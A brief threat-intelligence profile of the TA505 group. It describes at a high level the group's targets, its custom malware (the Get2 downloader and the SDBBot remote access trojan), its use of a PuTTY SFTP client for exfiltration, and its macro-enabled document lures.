Eager Beaver TA505

The TA505 threat group has been in operation since at least 2014 and continue to release new campaigns aimed at entities in multiple countries including Canada, Germany, South Korea, the UK, and the United States. Custom malware is used during the attacks including the Get2 downloader and the SDBBot remote access trojan. The actor is also known to use a PuTTY SFTP client to exfiltrate sensitive information from infected networks. The initial vector consists of malicious documents that appear legitimate and requires the victim to enable macros to start the infection chain.